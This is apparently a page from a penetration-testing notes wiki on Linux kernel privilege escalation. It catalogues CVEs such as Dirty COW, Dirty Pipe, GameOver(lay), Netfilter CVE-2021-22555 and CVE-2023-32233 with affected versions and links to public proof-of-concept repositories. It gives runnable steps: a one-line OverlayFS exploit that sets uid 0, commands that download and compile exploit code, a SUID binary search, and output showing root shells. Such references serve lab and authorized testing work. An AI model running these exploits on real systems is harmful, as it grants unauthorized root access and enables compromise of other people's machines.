Kernel Exploits

Linux Kernel Version

uname -a

Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Linux Kernel 4.4.0-116

$ uname -r

5.10.5-051005-generic

$ cat /etc/lsb-release 

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"

Kernel exploits can cause system instability so use caution when running these against a production system.

Google "Linux Kernel XXX exploit" and/or "OS XXX exploit"

Linux Exploit Suggester

linux-exploit-suggester/linux-exploit-suggester.sh at master · The-Z-Labs/linux-exploit-suggesterGitHub

Metasploit - Local Exploit Suggester

Multi Recon Local Exploit Suggester - Metasploit - InfosecMatterInfosecMatter

Universal local privilege escalation - CVE-2024-1086 - Linux kernels between v5.14 and v6.6

including Debian, Ubuntu, and KernelCTF

See Releases:

GitHub - Notselwyn/CVE-2024-1086: Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.GitHub

DirtyCow - Linux Kernel 2.6.22 < 3.9

PoCsGitHub

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)Exploit Database

Linux Kernel 4.4.0-116

Linux Kernel 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalati... - exploit database | Vulners.comVulners Database

gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit

$ ./kernel_exploit 

task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shell

Ubuntu 21.10 with kernel 5.13.0-37 -

GitHub - Bonfee/CVE-2022-0995: CVE-2022-0995 exploitGitHub

Ubuntu - CVE-2021-3493 OverlayFS

Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 19.04
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM

GitHub - briskets/CVE-2021-3493: Ubuntu OverlayFS Local PrivescGitHub

CVE-2022-23222 - Linux Kernel eBPF Local Privilege Escalation

Linux kernel through 5.15.14

GitHub - tr3ee/CVE-2022-23222: CVE-2022-23222: Linux Kernel eBPF Local Privilege EscalationGitHub

CVE-2022-0995

The exploit targets Ubuntu 21.10 with kernel 5.13.0-37

GitHub - Bonfee/CVE-2022-0995: CVE-2022-0995 exploitGitHub

Ubuntu - CVE-2023-32629 & CVE-2023-2640

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

GitHub - ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation: Ubuntu Privilege Escalation bash one-liner using CVE-2023-32629 & CVE-2023-2640GitHub

GameOver(lay) Ubuntu PrivEsc - CVE-2023-2640-CVE-2023-32629

Kernel version

Ubuntu release

6.2.0

Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)

5.19.0

Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)

5.4.0

Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)

GitHub - g1vi/CVE-2023-2640-CVE-2023-32629: GameOver(lay) Ubuntu Privilege EscalationGitHub

CVE-2023-35001

Kernel 5.19.0-35

GitHub - synacktiv/CVE-2023-35001: Pwn2Own Vancouver 2023 Ubuntu LPE exploitGitHub

HTB: Hospital0xdf hacks stuff

CVE-2023-0386 - OverlayFS vulnerability

kernel version lower than 6.2. Ubuntu 22.04

GitHub - xkaneiki/CVE-2023-0386: CVE-2023-0386在ubuntu22.04上的提权GitHub

The OverlayFS vulnerability CVE-2023-0386: Overview, detection, and remediationdatadoghq

HTB: TwoMillion0xdf hacks stuff

Ubuntu 22.04

GitHub - sxlmnwb/CVE-2023-0386: Vulnerabilities Exploitation On Ubuntu 22.04GitHub

CVE-2023-32233

Linux kernel through 6.3 - Tested on Ubuntu 23.04 (Lunar Lobster).

GitHub - Liuk3r/CVE-2023-32233: CVE-2023-32233: Linux内核中的安全漏洞GitHub

CVE-2023-4911 - Looney Tunables

Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13

GitHub - leesh3288/CVE-2023-4911: PoC for CVE-2023-4911GitHub

CVE-2023-4911: Local Privilege Escalation in glibc’s ld.so | QualysQualys

Ubuntu 24.04

Abusing Ubuntu 24.04 features for root privilege escalation | Snyk LabsSnyk Labs

Dirty Pipe - 5.8 to 5.17

All kernels from version 5.8 to 5.17

GitHub - AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits: A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.GitHub

$ git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
$ cd CVE-2022-0847-DirtyPipe-Exploits
$ bash compile.sh

Exploit 1

$ ./exploit-1

Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "piped"...
Password: Restoring /etc/passwd from /tmp/passwd.bak...
Done! Popping shell... (run commands now)

id

uid=0(root) gid=0(root) groups=0(root)

Exploit 2

$ find / -perm -4000 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/newgrp

$ ./exploit-2 /usr/bin/sudo

[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))

# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(cry0l1t3)

Netfilter

CVE-2021-22555 - 2.6 - 5.11

Vulnerable kernel versions: 2.6 - 5.11

$ uname -r

5.10.5-051005-generic

security-research/pocs/linux/cve-2021-22555 at master · google/security-researchGitHub

$ wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
$ gcc -m32 -static exploit.c -o exploit
$ ./exploit

[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: fff
[+] real_idx: fdf

...SNIP...

root@ubuntu:/home/cry0l1t3# id

uid=0(root) gid=0(root) groups=0(root)

CVE-2022-25636 - 4.5 - 5.6.10

Linux kernel 5.4 through 5.6.10

$ uname -r

5.13.0-051300-generic

GitHub - Bonfee/CVE-2022-25636: CVE-2022-25636GitHub

$ git clone https://github.com/Bonfee/CVE-2022-25636.git
$ cd CVE-2022-25636
$ make
$ ./exploit

[*] STEP 1: Leak child and parent net_device
[+] parent net_device ptr: 0xffff991285dc0000
[+] child  net_device ptr: 0xffff99128e5a9000

[*] STEP 2: Spray kmalloc-192, overwrite msg_msg.security ptr and free net_device
[+] net_device struct freed

[*] STEP 3: Spray kmalloc-4k using setxattr + FUSE to realloc net_device
[+] obtained net_device struct

[*] STEP 4: Leak kaslr
[*] kaslr leak: 0xffffffff823093c0
[*] kaslr base: 0xffffffff80ffefa0

[*] STEP 5: Release setxattrs, free net_device, and realloc it again
[+] obtained net_device struct

[*] STEP 6: rop :)

# id

uid=0(root) gid=0(root) groups=0(root)

CVE-2022-1015 - 5.12 - 5.17

Kernels after commit 345023b0db31 (v5.12) but before commit 6e1acfa387b9 (v5.17) are vulnerable.

GitHub - pqlx/CVE-2022-1015: Local privilege escalation PoC for Linux kernel CVE-2022-1015GitHub

CVE-2023-32233 - Up to 6.3.1

Linux Kernel up to version 6.3.1

GitHub - Liuk3r/CVE-2023-32233: CVE-2023-32233: Linux内核中的安全漏洞GitHub

$ git clone https://github.com/Liuk3r/CVE-2023-32233
$ cd CVE-2023-32233
$ gcc -Wall -o exploit exploit.c -lmnl -lnftnl

$ ./exploit

[*] Netfilter UAF exploit

Using profile:
========
1                   race_set_slab                   # {0,1}
1572                race_set_elem_count             # k
4000                initial_sleep                   # ms
100                 race_lead_sleep                 # ms
600                 race_lag_sleep                  # ms
100                 reuse_sleep                     # ms
39d240              free_percpu                     # hex
2a8b900             modprobe_path                   # hex
23700               nft_counter_destroy             # hex
347a0               nft_counter_ops                 # hex
a                   nft_counter_destroy_call_offset # hex
ffffffff            nft_counter_destroy_call_mask   # hex
e8e58948            nft_counter_destroy_call_check  # hex
========

[*] Checking for available CPUs...
[*] sched_getaffinity() => 0 2
[*] Reserved CPU 0 for PWN Worker
[*] Started cpu_spinning_loop() on CPU 1
[*] Started cpu_spinning_loop() on CPU 2
[*] Started cpu_spinning_loop() on CPU 3
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...

...SNIP...

[*] You've Got ROOT:-)

# id

uid=0(root) gid=0(root) groups=0(root)

PreviousMiscellaneous Techniques NextShared Libraries

Last updated 1 year ago